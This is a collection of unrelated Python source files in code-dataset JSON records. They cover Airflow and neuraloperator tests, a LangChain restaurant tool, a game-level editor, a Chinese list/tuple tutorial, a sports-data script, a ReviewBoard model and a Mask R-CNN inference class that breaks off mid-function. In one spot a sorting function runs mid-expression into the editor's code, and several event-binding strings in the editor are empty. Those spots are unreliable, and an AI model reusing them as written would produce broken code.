rendered = wrapped_markdown(\n \"\"\"\n # header\n 1st line\n 2nd line\n \"\"\"\n )\n\n assert (\n \"\"\"<div class=\"rich_doc\" ><h1>header</h1>\n<p>1st line\\n2nd line</p>\n</div>\"\"\"\n == rendered\n )\n\n def test_wrapped_markdown_with_raw_code_block(self):\n rendered = wrapped_markdown(\n \"\"\"\\\n # Markdown code block\n\n Inline `code` works well.\n\n Code block\n does not\n respect\n newlines\n\n \"\"\"\n )\n\n assert (\n \"\"\"<div class=\"rich_doc\" ><h1>Markdown code block</h1>\n<p>Inline <code>code</code> works well.</p>\n<pre><code>Code block\\ndoes not\\nrespect\\nnewlines\\n</code></pre>\n</div>\"\"\"\n == rendered\n )\n\n def test_wrapped_markdown_with_nested_list(self):\n rendered = wrapped_markdown(\n \"\"\"\n ### Docstring with a code block\n\n - And\n - A nested list\n \"\"\"\n )\n\n assert (\n \"\"\"<div class=\"rich_doc\" ><h3>Docstring with a code block</h3>\n<ul>\n<li>And\n<ul>\n<li>A nested list</li>\n</ul>\n</li>\n</ul>\n</div>\"\"\"\n == rendered\n )\n\n def test_wrapped_markdown_with_collapsible_section(self):\n rendered = wrapped_markdown(\n \"\"\"\n# A collapsible section with markdown\n<details>\n <summary>Click to expand!</summary>\n\n ## Heading\n 1. A numbered\n 2. list\n * With some\n * Sub bullets\n</details>\n \"\"\"\n )\n\n assert (\n \"\"\"<div class=\"rich_doc\" ><h1>A collapsible section with markdown</h1>\n<details>\n <summary>Click to expand!</summary>\n<h2>Heading</h2>\n<ol>\n<li>A numbered</li>\n<li>list\n<ul>\n<li>With some</li>\n<li>Sub bullets</li>\n</ul>\n</li>\n</ol>\n</details>\n</div>\"\"\"\n == rendered\n )\n\n\ndef test_dag_run_custom_sqla_interface_delete_no_collateral_damage(dag_maker, session):\n interface = DagRunCustomSQLAInterface(obj=DagRun, session=session)\n dag_ids = (f\"test_dag_{x}\" for x in range(1, 4))\n dates = (pendulum.datetime(2023, 1, x) for x in range(1, 4))\n for dag_id, date in itertools.product(dag_ids, dates):\n with dag_maker(dag_id=dag_id) as dag:\n dag.create_dagrun(execution_date=date, state=\"running\", run_type=\"scheduled\")\n dag_runs = session.query(DagRun).all()\n assert len(dag_runs) == 9\n assert len(set(x.run_id for x in dag_runs)) == 3\n run_id_for_single_delete = \"scheduled__2023-01-01T00:00:00+00:00\"\n # we have 3 runs with this same run_id\n assert sum(1 for x in dag_runs if x.run_id == run_id_for_single_delete) == 3\n # each is a different dag\n\n # if we delete one, it shouldn't delete the others\n one_run = next(x for x in dag_runs if x.run_id == run_id_for_single_delete)\n assert interface.delete(item=one_run) is True\n session.commit()\n dag_runs = session.query(DagRun).all()\n # we should have one fewer dag run now\n assert len(dag_runs) == 8\n\n # now let's try multi delete\n run_id_for_multi_delete = \"scheduled__2023-01-02T00:00:00+00:00\"\n # verify we have 3\n runs_of_interest = [x for x in dag_runs if x.run_id == run_id_for_multi_delete]\n assert len(runs_of_interest) == 3\n # and that each is different dag\n assert len(set(x.dag_id for x in dag_runs)) == 3\n\n to_delete = runs_of_interest[:2]\n # now try multi delete\n assert interface.delete_all(items=to_delete) is True\n session.commit()\n dag_runs = session.query(DagRun).all()\n assert len(dag_runs) == 6\n assert len(set(x.dag_id for x in dag_runs)) == 3\n assert len(set(x.run_id for x in dag_runs)) == 3\n","repo_name":"a0x8o/airflow","sub_path":"tests/www/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":13569,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
{"seq_id":"17516947119","text":"from langchain.tools import BaseTool\nfrom cassandra.cluster import Cluster\nfrom cassandra.auth import PlainTextAuthProvider\nimport streamlit as st\nimport openai\nfrom dotenv import dotenv_values\n\n### parameters #########\nconfig = dotenv_values('conf.env')\nopenai.api_key = config['OPENAI_API_KEY']\nSECURE_CONNECT_BUNDLE_PATH = config['SECURE_CONNECT_BUNDLE_PATH']\nASTRA_CLIENT_ID = config['ASTRA_CLIENT_ID']\nASTRA_CLIENT_SECRET = config['ASTRA_CLIENT_SECRET']\ncloud_config = {\n 'secure_connect_bundle': SECURE_CONNECT_BUNDLE_PATH\n }\nauth_provider = PlainTextAuthProvider(ASTRA_CLIENT_ID, ASTRA_CLIENT_SECRET)\ncluster = Cluster(cloud=cloud_config, auth_provider=auth_provider)\nsession = cluster.connect()\n \n\nclass Waiter(BaseTool):\n name = \"Waiter\"\n description = \"Use this tool as if you are a waiter and help customers with their order. You need to check what is available in the menu, but you can provide concise responses. You also tell the total cost of their order. 
\"\n\n def _run(self,user_question):\n KEYSPACE_NAME = 'vector'\n TABLE_NAME = 'restaurant'\n model_id = \"text-embedding-ada-002\"\n embedding = openai.Embedding.create(openai_api_key=openai.api_key,input=user_question, model=model_id)['data'][0]['embedding']\n for row in session.execute(f\"SELECT document_id,document,embedding_vector FROM {KEYSPACE_NAME}.{TABLE_NAME} ORDER BY embedding_vector ANN OF {embedding} LIMIT 1\"):\n res = row.document \n\n return res \n\n def _arun(self, query: str):\n raise NotImplementedError(\"This tool does not support async\")\n\n\nclass TotalAmount(BaseTool):\n name = \"TotalAmount\"\n description = \"Use this tool as you are waiter and You can provide concise responses. You don't need to tell each price of the food but you can tell the total cost of the order\"\n \n def _run(self,user_question):\n KEYSPACE_NAME = 'vector'\n TABLE_NAME = 'restaurant'\n model_id = \"text-embedding-ada-002\"\n embedding = openai.Embedding.create(openai_api_key=openai.api_key,input=user_question, model=model_id)['data'][0]['embedding']\n for row in session.execute(f\"SELECT document_id,document,embedding_vector FROM {KEYSPACE_NAME}.{TABLE_NAME} ORDER BY embedding_vector ANN OF {embedding} LIMIT 1\"):\n res = row.document \n\n return res \n\n def _arun(self, query: str):\n raise NotImplementedError(\"This tool does not support async\")","repo_name":"betloreilly/ServAI","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35468040735","text":"from neuralop.losses.data_losses import (\n\tcentral_diff_1d,\n\tcentral_diff_2d)\n\nimport pytest\nimport torch\nimport torch.nn as nn\n\ndef test_torch_roll_works():\n\t\"\"\"\n\thttps://pytorch.org/docs/stable/generated/torch.roll.html\n\ttorch.roll(input, shifts, dims=None) -> Tensor\n\tRoll tensor input along given dimension(s). Elements shifted beyond last\n\tposition are reintroduced at first position. 
If dims is None, tensor will be\n\tflattened before rolling and then restored to original shape.\n\t\"\"\"\n\tx = torch.tensor([i for i in range(1, 9)]).view(4, 2)\n\tfor i in range(4):\n\t\tfor j in range(2):\n\t\t\tassert x[i, j] == i * 2 + j + 1\n\n\ty = torch.roll(x, 1)\n\tfor i in range(4):\n\t\tfor j in range(2):\n\t\t\t# only the wrapped-around element (0, 0) breaks the i * 2 + j pattern\n\t\t\tif not (i == 0 and j == 0):\n\t\t\t\tassert y[i, j] == i * 2 + j\n\t\t\telse:\n\t\t\t\tassert y[0, 0] == 8\n\n\n\ndef test_torch_roll_itself_does_not_mutate():\n\tx = torch.tensor([i for i in range(1, 9)]).view(4, 2)\n\ty = torch.roll(x, 1, 0)\n\n\tfor i in range(4):\n\t\tfor j in range(2):\n\t\t\tassert x[i, j] == i * 2 + j + 1\n\t\t\tif (i > 0):\n\t\t\t\tassert y[i, j] == (i - 1) * 2 + j + 1\n\t\t\telse:\n\t\t\t\tassert y[i, j] == j + 7\n\n\ty = torch.roll(x, -1, 0)\n\tfor i in range(4):\n\t\tfor j in range(2):\n\t\t\tassert x[i, j] == i * 2 + j + 1\n\t\t\tif (i < 3):\n\t\t\t\tassert y[i, j] == i * 2 + j + 3\n\t\t\telse:\n\t\t\t\tassert y[i, j] == j + 1\n\n\ty = torch.roll(x, shifts=(2, 1), dims=(0, 1))\n\tfor i in range(4):\n\t\tfor j in range(2):\n\t\t\tassert x[i, j] == i * 2 + j + 1\n\t\t\tif (i < 2):\n\t\t\t\tassert y[i, j] == i * 2 - j + 6\n\t\t\telse:\n\t\t\t\tassert y[i, j] == (i - 2) * 2 - j + 2\n\ndef test_torch_l1loss_constructs():\n\t\"\"\"\n\thttps://pytorch.org/docs/stable/generated/torch.nn.L1Loss.html#torch.nn.L1Loss\n\n\ttorch.nn.L1Loss(size_average=None,reduce=None,reduction='mean')\n\tCreates a criterion that measures mean absolute error (MAE) between each\n\telement in input x and target y.\n\n\tOutput: scalar. If reduction is 'none', then (*), same shape as input.\n\t\"\"\"\n\tloss = nn.L1Loss()\n\t# requires_grad=True tells PyTorch to keep track of operations performed on\n\t# that tensor so gradients can be calculated with respect to it.\n\tinput = torch.randn(3, 5, requires_grad=True)\n\ttarget = torch.randn(3, 5)\n\toutput = loss(input, target)\n\toutput.backward()\n\n\tinput = torch.tensor([\n\t\t[float(i + 1 + j * 5) for i in range(5)] for j in range(3)],\n\t\trequires_grad=True)\n\n\ttarget = torch.tensor(\n\t\t[[float(5 * (j + 1) - i) for i in range(5)] for j in range(3)])\n\n\toutput = loss(input, target)\n\tassert output.item() == pytest.approx(2.4)","repo_name":"ernestyalumni/InServiceOfX","sub_path":"ThirdParty/NeuralOperators/IntegrationTests/neuralop/losses/test_data_losses.py","file_name":"test_data_losses.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"32380883754","text":"from datetime import datetime\n\nclass Queue:\n def __init__(self):\n self.queue = []\n def enq(self,v):\n self.queue.append(v)\n def isempty(self):\n return(self.queue == [])\n def delq(self):\n v = None\n if not self.isempty():\n v = self.queue[0]\n self.queue = self.queue[1:]\n return(v)\n def __str__(self):\n return(str(self.queue))\n\nl = [['Wes', '12:00:30'],['Michella', '12:03:40'],['Asher', '12:00:01']]\n\n\ndef minl(l):\n for i in range(len(l)):\n d = datetime.strptime(l[i][1],'%H:%M:%S')\n k=i\n for j in range(i+1,len(l)):\n if (datetime.strptime(l[j][1],'%H:%M:%S')= obj.x - obj.w / 2 and x <= obj.x + obj.w / 2 and\n y >= -obj.y - obj.h / 2 and y <= -obj.y + obj.h / 2):\n global selected\n selected = obj\n redrawObjects()\n refreshFields()\n break\n\n## Begins moving the canvas based on the mouse position.\n\n\ndef canvasMoveStart(event):\n selectFromCanvas(event)\n canvas.scan_mark(event.x, event.y)\n\n\ncanvas.bind(\"<ButtonPress-1>\", canvasMoveStart)\n\n## 
Moves the canvas based on the mouse position.\n\n\ndef canvasMouseMove(event):\n canvas.scan_dragto(event.x, event.y, gain=1)\n\n\ncanvas.bind(\"<B1-Motion>\", canvasMouseMove)\n\n## Deletes the selected game object.\n\n\ndef deleteSelected(key):\n global selected\n if not selected:\n return\n globalObjs.remove(selected)\n selected = None\n refreshAll()\n\n\ncanvas.bind(\"<Delete>\", deleteSelected)\n\n## Draws the given image to the canvas.\n\n\ndef drawImage(path, obj):\n im = Image.open(os.path.join(getPath()+\"/../Assets/Sprites/\", path)).convert(\n \"RGB\").resize((obj.w, obj.h), resample=Image.BILINEAR)\n sprite = ImageTk.PhotoImage(im)\n spriteStore.append(sprite)\n canvas.create_image(obj.x, -obj.y, image=sprite)\n\n## Redraws all game objects on the canvas.\n\n\ndef redrawObjects():\n app.clearCanvas(canvasTitle)\n spriteStore.clear()\n # axes\n canvas.create_line(-2000, 0, 2000, 0, fill=\"black\")\n canvas.create_line(0, -2000, 0, 2000, fill=\"black\")\n for i in range(-20, 21):\n canvas.create_line(-5, i*100, 5, i*100, fill=\"black\")\n canvas.create_line(i*100, -5, i*100, 5, fill=\"black\")\n\n for obj in globalObjs:\n if (selected and selected == obj):\n canvas.create_rectangle(obj.x - obj.w / 2 - 1, -obj.y - obj.h / 2 - 1,\n obj.x + obj.w / 2 + 1, -obj.y + obj.h / 2 + 1, fill=\"green\")\n elif not obj.spriteName:\n canvas.create_rectangle(obj.x - obj.w / 2, -obj.y - obj.h / 2,\n obj.x + obj.w / 2, -obj.y + obj.h / 2, fill=\"red\")\n if obj.spriteName:\n drawImage(obj.spriteName, obj)\n\n\n\n# |||||||||||| \"Inspector\" Section ||||||||||||\napp.startPanedFrame(\"inspector\")\n\n# Editable parts of object\napp.startFrame(\"fields\", 0, 0)\n## The label for the namefield.\nnameField = \"Name\"\napp.addLabelEntry(nameField, 0, 0, 2, 1)\n## The label for the x coordinate field.\nxField = \"X\"\napp.addLabelNumericEntry(xField, 1, 0)\n## The label for the y coordinate field.\nyField = \"Y\"\napp.addLabelNumericEntry(yField, 1, 1)\n## The label for the width field.\nwField = \"W\"\napp.addLabelNumericEntry(wField, 2, 0)\n## The label for the height field.\nhField = \"H\"\napp.addLabelNumericEntry(hField, 2, 1)\n## The label for the permanent field.\npermanentField = \"Permanent\"\napp.addCheckBox(permanentField, 3, 0)\n\n## The label for the module name field.\nmoduleNameField = \"Module Name\"\nscriptEntry = app.addLabelEntry(moduleNameField, 4, 0, 2, 1)\n## The label for the class name field.\nclassNameField = \"Class Name\"\napp.addLabelValidationEntry(classNameField, 5, 0, 2, 1)\n## The label for the sprite name field.\nspriteNameField = \"Sprite Name\"\napp.addLabelFileEntry(spriteNameField, 6, 0, 2, 1)\n\n## Sets the currently selected game object to be layered one layer up.\n\n\ndef layerUpFunc():\n if not selected:\n return\n for i in range(len(globalObjs)):\n if selected == globalObjs[i] and i != 0:\n temp = globalObjs[i]\n globalObjs[i] = globalObjs[i-1]\n globalObjs[i-1] = temp\n refreshAll()\n break\n\n\n## The label for the layer up name field.\nlayerUp = \"Move Up\"\napp.addNamedButton(layerUp, layerUp, layerUpFunc, 7, 0)\n\n## Sets the currently selected game object to be layered one layer down.\n\n\ndef layerDownFunc():\n if not selected:\n return\n for i in range(len(globalObjs)):\n if selected == globalObjs[i] and i != len(globalObjs)-1:\n temp = globalObjs[i]\n globalObjs[i] = globalObjs[i+1]\n globalObjs[i+1] = temp\n refreshAll()\n break\n\n\n## The label for the layer down name field.\nlayerDown = \"Move Down\"\napp.addNamedButton(layerDown, layerDown, layerDownFunc, 7, 
1)\n\napp.stopFrame()\n\napp.setFont(20)\n## The label for the scene hierarchy\nlistBox = \"Scene Hierarchy\"\n## Side list with all objects\nlb = app.addListBox(listBox, [], 1, 0)\nlb.bind(\"\", deleteSelected)\n\napp.stopAllPanedFrames()\n\n## Refreshes all of the fields.\n\n\ndef refreshFields():\n if not selected:\n app.clearEntry(nameField)\n app.clearEntry(xField)\n app.clearEntry(yField)\n app.clearEntry(wField)\n app.clearEntry(hField)\n app.clearEntry(moduleNameField)\n app.clearEntry(classNameField)\n app.clearEntry(spriteNameField)\n app.setCheckBox(permanentField, ticked=False)\n return\n app.setEntry(nameField, selected.name)\n app.setEntry(xField, str(selected.x))\n app.setEntry(yField, str(selected.y))\n app.setEntry(wField, str(selected.w))\n app.setEntry(hField, str(selected.h))\n app.setEntry(moduleNameField, selected.scriptName)\n app.setEntry(classNameField, selected.className)\n actualSpriteName = \"\"\n if(selected.spriteName != \"\" and selected.spriteName != None):\n actualSpriteName = os.path.join(getPath(), selected.spriteName)\n app.setEntry(spriteNameField, actualSpriteName)\n app.setCheckBox(permanentField, ticked=selected.permanent)\n\n## Refreshes the list of game objects.\n\n\ndef refreshList():\n app.clearListBox(listBox)\n for obj in globalObjs:\n app.addListItem(listBox, obj.name)\n\n## Selects a game object from the list.\n\n\ndef selectInList(event):\n if app.getListBox(listBox):\n objName = lb.selection_get()\n for obj in globalObjs:\n if objName == obj.name:\n global selected\n selected = obj\n redrawObjects()\n refreshFields()\n break\n\n\nlb.bind(\"\", selectInList)\nlb.bind(\"\", selectInList)\n\n## Sets the name via name field input.\n\n\ndef setName():\n global selected\n if not selected:\n return\n newName = checkNameDups(app.getEntry(nameField))\n selected.name = newName\n refreshList()\n\n\napp.setEntrySubmitFunction(nameField, setName)\n\n## Sets the x coordinate via x field input.\n\n\ndef setX():\n global selected\n if not selected:\n return\n newX = app.getEntry(xField)\n if(newX == None):\n intX = 0\n else:\n intX = int(newX)\n if selected.x != intX:\n selected.x = intX\n redrawObjects()\n\n\napp.setEntryChangeFunction(xField, setX)\n\n## Sets the y coordinate via y field input.\n\n\ndef setY():\n global selected\n if not selected:\n return\n newY = app.getEntry(yField)\n if(newY == None):\n intY = 0\n else:\n intY = int(newY)\n if selected.y != intY:\n selected.y = intY\n redrawObjects()\n\n\napp.setEntryChangeFunction(yField, setY)\n\n## Sets the width via width field input.\n\n\ndef setW():\n global selected\n if not selected:\n return\n newW = app.getEntry(wField)\n if(newW == None):\n intW = 0\n else:\n intW = int(newW)\n if selected.w != intW:\n selected.w = intW\n redrawObjects()\n\n\napp.setEntryChangeFunction(wField, setW)\n\n## Sets the height via height field input.\n\n\ndef setH():\n global selected\n if not selected:\n return\n newH = app.getEntry(hField)\n if(newH == None):\n intH = 0\n else:\n intH = int(newH)\n if selected.h != intH:\n selected.h = intH\n redrawObjects()\n\n\napp.setEntryChangeFunction(hField, setH)\n\n## Sets the script name via script field input.\n\n\ndef setScriptName():\n global selected\n if not selected:\n return\n newScriptName = app.getEntry(moduleNameField)\n if newScriptName != selected.scriptName:\n selected.scriptName = newScriptName\n\n\napp.setEntryChangeFunction(moduleNameField, setScriptName)\n\n## Sets the class name via class field input.\n\n\ndef setClassName():\n global selected\n if 
not selected:\n return\n newClassName = app.getEntry(classNameField)\n if newClassName != selected.className:\n selected.className = newClassName\n\n\napp.setEntryChangeFunction(classNameField, setClassName)\n\n## Sets the sprite name via sprite field input.\n\n\ndef setSpriteName():\n global selected\n if not selected:\n return\n newSpriteName = app.getEntry(spriteNameField)\n if(newSpriteName != \"\" and newSpriteName != None):\n actualSpriteName = os.path.basename(newSpriteName)\n else:\n actualSpriteName = newSpriteName\n if actualSpriteName != selected.spriteName:\n selected.spriteName = actualSpriteName\n redrawObjects()\n\n\napp.setEntryChangeFunction(spriteNameField, setSpriteName)\n\n## Sets the permanent field via permanent field input.\n\n\ndef setPermanentField():\n global selected\n if not selected:\n return\n selected.permanent = app.getCheckBox(permanentField)\n\n\napp.setCheckBoxChangeFunction(permanentField, setPermanentField)\n\n## Refreshes everything.\n\n\ndef refreshAll():\n refreshList()\n refreshFields()\n redrawObjects()\n\n\nrefreshAll()\napp.go()\n","repo_name":"trevday/eternal2d-engine","sub_path":"Engine/Eternal2D/Editor/eternal2Deditor.py","file_name":"eternal2Deditor.py","file_ext":"py","file_size_in_byte":14142,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"28181543699","text":"#Python内置的一种数据类型是列表:list。list是一种有序的集合,可以随时添加和删除其中的元素。\nclassmates = ['Michael', 'Bob', 'Tracy']\n#变量classmates就是一个list。用len()函数可以获得list元素的个数:\nprint(len(classmates))\n#用索引来访问list中每一个位置的元素,记得索引是从0开始的:\nprint(classmates[0]) #Michael\n#如果要取最后一个元素,除了计算索引位置外,还可以用-1做索引,直接获取最后一个元素:\nprint(classmates[-1]) # Tracy\n#以此类推,可以获取倒数第2个、倒数第3个:\n\n#list是一个可变的有序表,所以,可以往list中追加元素到末尾:\nclassmates.append(\"Adam\")\nclassmates.insert(1,\"Jack\")\n#要删除list末尾的元素,用pop()方法:\nclassmates.pop()\n#要删除指定位置的元素,用pop(i)方法,其中i是索引位置:\nclassmates.pop(1)\n#要把某个元素替换成别的元素,可以直接赋值给对应的索引位置:\nclassmates[1] = 'Sarah'\n#list里面的元素的数据类型也可以不同,比如:\nL = ['Apple', 123, True]\ns = ['python', 'java', ['asp', 'php'], 'scheme']\n\n#tuple\n#另一种有序列表叫元组:tuple。tuple和list非常类似,但是tuple一旦初始化就不能修改,比如同样是列出同学的名字:\n\nclassmates = ('Michael', 'Bob', 'Tracy')\n#现在,classmates这个tuple不能变了,它也没有append(),insert()这样的方法。其他获取元素的方法和list是一样的,你可以正常地使用classmates[0],classmates[-1],但不能赋值成另外的元素。\n#定义的不是tuple,是1这个数!这是因为括号()既可以表示tuple,又可以表示数学公式中的小括号,这就产生了歧义,因此,Python规定,这种情况下,按小括号进行计算,计算结果自然是1。\n#所以,只有1个元素的tuple定义时必须加一个逗号,,来消除歧义:\nt = (1,)\n#理论上tuple不可变,但是在一些特定的情况下可以变化(实际变的不是tuple)\nt = ('a', 'b', ['A', 'B'])\nt[2][0] = 'X'\nt[2][1] = 'Y'\nprint(t) # ('a', 'b', ['X', 'Y'])\n\n#表面上看,tuple的元素确实变了,但其实变的不是tuple的元素,而是list的元素。tuple一开始指向的list并没有改成别的list,所以,tuple所谓的“不变”是说,tuple的每个元素,指向永远不变。即指向'a',就不能改成指向'b',\n#指向一个list,就不能改成指向其他对象,但指向的这个list本身是可变的!\n#理解了“指向不变”后,要创建一个内容也不变的tuple怎么做?那就必须保证tuple的每一个元素本身也不能变。\n\n\n#练习:请用索引取出下面list的指定元素:\nL = [\n ['Apple', 'Google', 'Microsoft'],\n ['Java', 'Python', 'Ruby', 'PHP'],\n ['Adam', 'Bart', 'Lisa']\n]\n\nprint(\"打印Apple:%s\" % L[0][0])\nprint('打印Python: %s' % L[1][1])\nprint(\"打印Lisa: %s\" % L[2][2])","repo_name":"luyanjie/maomaochong","sub_path":"learn-python3/samples/basic/ListTuple.py","file_name":"ListTuple.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37127604073","text":"from ohmysportsfeedspy import MySportsFeeds\nimport datetime\n\n\nmsf = MySportsFeeds(version='2.1',verbose=True)\nmsf.authenticate(\"API KEY\", \"MYSPORTSFEEDS\")\n\n\n# Pull CSV from My Sports 
Feeds API\nyear = 2016\ndays = [datetime.datetime(year, 4, 3) + datetime.timedelta(days=i) for i in range(183)]\ngame_date = [day.strftime(\"%Y%m%d\") for day in days]\n\n\nfor day in game_date:\n\toutput = msf.msf_get_data(league='mlb',season=str(year)+'-regular',feed='daily_player_gamelogs' ,format='json', date=day, fordate=day)\n","repo_name":"chrism1148/my_sports_feeds_mlb","sub_path":"get_mlb_gamelog.py","file_name":"get_mlb_gamelog.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"47023169758","text":"import os\n\nfrom django.conf import settings\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom reviewboard.attachments.mimetypes import MIMETYPE_ICON_ALIASES\n\n\nclass FileAttachment(models.Model):\n \"\"\"A file associated with a review request.\n\n Like diffs, a file can have comments associated with it.\n These comments are of type :model:`reviews.FileComment`.\n \"\"\"\n caption = models.CharField(_(\"caption\"), max_length=256, blank=True)\n draft_caption = models.CharField(_(\"draft caption\"),\n max_length=256, blank=True)\n file = models.FileField(_(\"file\"),\n upload_to=os.path.join('uploaded', 'files',\n '%Y', '%m', '%d'))\n mimetype = models.CharField(_('mimetype'), max_length=256, blank=True)\n\n @property\n def filename(self):\n \"\"\"Returns the filename for display purposes.\"\"\"\n return os.path.basename(self.file.name)\n\n @property\n def icon_url(self):\n \"\"\"Returns the icon URL for this file.\"\"\"\n if self.mimetype in MIMETYPE_ICON_ALIASES:\n name = MIMETYPE_ICON_ALIASES[self.mimetype]\n else:\n category = self.mimetype.split('/')[0]\n name = self.mimetype.replace('/', '-')\n\n mimetypes_dir = os.path.join(settings.MEDIA_ROOT, 'rb', 'images',\n 'mimetypes')\n\n if not os.path.exists(os.path.join(mimetypes_dir, name + '.png')):\n name = category + '-x-generic'\n\n if not os.path.exists(os.path.join(mimetypes_dir,\n name + '.png')):\n # We'll just use this as our fallback.\n name = 'text-x-generic'\n\n return '%srb/images/mimetypes/%s.png?%s' % \\\n (settings.MEDIA_URL, name, settings.MEDIA_SERIAL)\n\n def __unicode__(self):\n return self.caption\n\n def get_review_request(self):\n try:\n return self.review_request.all()[0]\n except IndexError:\n try:\n return self.inactive_review_request.all()[0]\n except IndexError:\n # Maybe it's on a draft.\n try:\n draft = self.drafts.get()\n except ReviewRequestDraft.DoesNotExist:\n draft = self.inactive_drafts.get()\n\n return draft.review_request\n\n def get_absolute_url(self):\n return self.file.url\n","repo_name":"chazy/reviewboard","sub_path":"reviewboard/attachments/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"6962767088","text":"import numpy as np\nimport tensorflow as tf\nimport keras\nimport keras.backend as K\nimport keras.layers as KL\nimport keras.engine as KE\nimport keras.models as KM\nfrom mrcnn.model import build_fpn_mask_graph, DetectionLayer, resnet_graph, build_rpn_model, ProposalLayer, fpn_classifier_graph\nfrom mrcnn.config import Config\nfrom mrcnn import model as modellib, utils\n\nclass InferenceModel(modellib.MaskRCNN):\n def __init__(self, config, model_dir):\n super().__init__('nobuild', config, model_dir)\n self.keras_model = self.build(config=config)\n\n def build(self, config):\n \"\"\"Build Mask R-CNN 
architecture.\n input_shape: The shape of the input image.\n mode: Either \"training\" or \"inference\". The inputs and\n outputs of the model differ accordingly.\n \"\"\"\n\n # Image size must be dividable by 2 multiple times\n h, w = config.IMAGE_SHAPE[:2]\n if h / 2**6 != int(h / 2**6) or w / 2**6 != int(w / 2**6):\n raise Exception(\"Image size must be dividable by 2 at least 6 times \"\n \"to avoid fractions when downscaling and upscaling.\"\n \"For example, use 256, 320, 384, 448, 512, ... etc. \")\n\n # Inputs\n input_image = KL.Input(\n shape=config.IMAGE_SHAPE, name=\"input_image\")\n\n test_img = np.zeros(config.IMAGE_SHAPE)\n _, image_metas, _ = self.mold_inputs([test_img])\n #input_image_meta = KL.Input(tensor=K.constant(image_metas, name=\"input_image_meta\"))\n input_image_meta = KL.Lambda(lambda x:K.constant(image_metas, name=\"input_image_meta\"))(input_image)\n #input_image_meta = KL.Input(shape=[config.IMAGE_META_SIZE],\n # name=\"input_image_meta\")\n\n # Anchors\n anchors = self.get_anchors(self.config.IMAGE_SHAPE)\n # Duplicate across the batch dimension because Keras requires it\n # TODO: can this be optimized to avoid duplicating the anchors?\n anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)\n\n # Anchors in normalized coordinates\n #input_anchors = KL.Input(tensor=K.constant(anchors, name=\"input_anchors\"))\n input_anchors = KL.Lambda(lambda x:K.constant(anchors, name=\"input_anchors\"))(input_image)\n\n # Build the shared convolutional layers.\n # Bottom-up Layers\n # Returns a list of the last layers of each stage, 5 in total.\n # Don't create the thead (stage 5), so we pick the 4th item in the list.\n if callable(config.BACKBONE):\n _, C2, C3, C4, C5 = config.BACKBONE(input_image, stage5=True,\n train_bn=config.TRAIN_BN)\n else:\n _, C2, C3, C4, C5 = resnet_graph(input_image, config.BACKBONE,\n stage5=True, train_bn=config.TRAIN_BN)\n # Top-down Layers\n # TODO: add assert to verify feature map sizes match what's in config\n P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c5p5')(C5)\n P4 = KL.Add(name=\"fpn_p4add\")([\n KL.UpSampling2D(size=(2, 2), name=\"fpn_p5upsampled\")(P5),\n KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c4p4')(C4)])\n P3 = KL.Add(name=\"fpn_p3add\")([\n KL.UpSampling2D(size=(2, 2), name=\"fpn_p4upsampled\")(P4),\n KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c3p3')(C3)])\n P2 = KL.Add(name=\"fpn_p2add\")([\n KL.UpSampling2D(size=(2, 2), name=\"fpn_p3upsampled\")(P3),\n KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c2p2')(C2)])\n # Attach 3x3 conv to all P layers to get the final feature maps.\n P2 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p2\")(P2)\n P3 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p3\")(P3)\n P4 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p4\")(P4)\n P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p5\")(P5)\n # P6 is used for the 5th anchor scale in RPN. 
Generated by\n # subsampling from P5 with stride of 2.\n P6 = KL.MaxPooling2D(pool_size=(1, 1), strides=2, name=\"fpn_p6\")(P5)\n\n # Note that P6 is used in RPN, but not in the classifier heads.\n rpn_feature_maps = [P2, P3, P4, P5, P6]\n mrcnn_feature_maps = [P2, P3, P4, P5]\n\n # Anchors\n anchors = input_anchors\n\n # RPN Model\n rpn = build_rpn_model(config.RPN_ANCHOR_STRIDE,\n len(config.RPN_ANCHOR_RATIOS), config.TOP_DOWN_PYRAMID_SIZE)\n # Loop through pyramid layers\n layer_outputs = [] # list of lists\n for p in rpn_feature_maps:\n layer_outputs.append(rpn([p]))\n # Concatenate layer outputs\n # Convert from list of lists of level outputs to list of lists\n # of outputs across levels.\n # e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]]\n output_names = [\"rpn_class_logits\", \"rpn_class\", \"rpn_bbox\"]\n outputs = list(zip(*layer_outputs))\n outputs = [KL.Concatenate(axis=1, name=n)(list(o))\n for o, n in zip(outputs, output_names)]\n\n rpn_class_logits, rpn_class, rpn_bbox = outputs\n\n # Generate proposals\n # Proposals are [batch, N, (y1, x1, y2, x2)] in normalized coordinates\n # and zero padded.\n proposal_count = config.POST_NMS_ROIS_INFERENCE\n rpn_rois = ProposalLayer(\n proposal_count=proposal_count,\n nms_threshold=config.RPN_NMS_THRESHOLD,\n 